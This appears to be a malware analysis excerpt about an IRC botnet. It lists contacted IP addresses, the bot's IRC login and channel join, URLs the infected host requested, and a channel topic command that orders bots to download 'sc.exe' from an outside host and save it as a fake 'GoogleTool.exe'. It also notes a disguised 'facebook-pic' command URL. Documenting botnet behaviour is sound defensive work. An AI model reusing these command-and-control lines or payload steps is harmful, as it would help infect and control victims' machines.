Remote Host Port Number
173.245.60.21 80
63.135.80.224 80
63.135.80.46 80
64.62.181.43 80
72.21.91.19 80
212.7.214.129 2866 PASS xxx
NICK NEW-[USA|00|P|77494]
USER XP-8936 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|77494] -ix
JOIN #!nine! test
PONG 22 MOTD
* The data identified by the following URLs was then requested from the remote web server:
o http://www.refillntime.com/sweet.txt
o http://browseusers.myspace.com/Browse/Browse.aspx
o http://www.myspace.com/browse/people
o http://www.myspace.com/help/browserunsupported
o http://glutten.fileave.com/sc.exe
o http://x.myspacecdn.com/modules/splash/static/img/cornersSheet.png
o http://x.myspacecdn.com/images/BrowserUpgrade/bg_infobox.jpg
o http://x.myspacecdn.com/images/BrowserUpgrade/icon_information.gif
o http://x.myspacecdn.com/images/BrowserUpgrade/bg_browserSection.jpg
o http://x.myspacecdn.com/images/BrowserUpgrade/browserLogos_med.jpg
Now talking in #!nine!
Topic On: [ #!nine! ] [ .g.f http://glutten.fileave.com/sc.exe C:WindowsTempGoogleTool.exe 1 ]
Topic By: [ bauders ]
(bauders) .g.f http://glutten.fileave.com/sc.exe C:WindowsTempGoogleTool.exe 1
sc.exe sends commands to bots with this url :
http://www.villamatildabb.com/facebook-pic-#####-JPEG
hosting infos:
http://whois.domaintools.com/212.7.214.129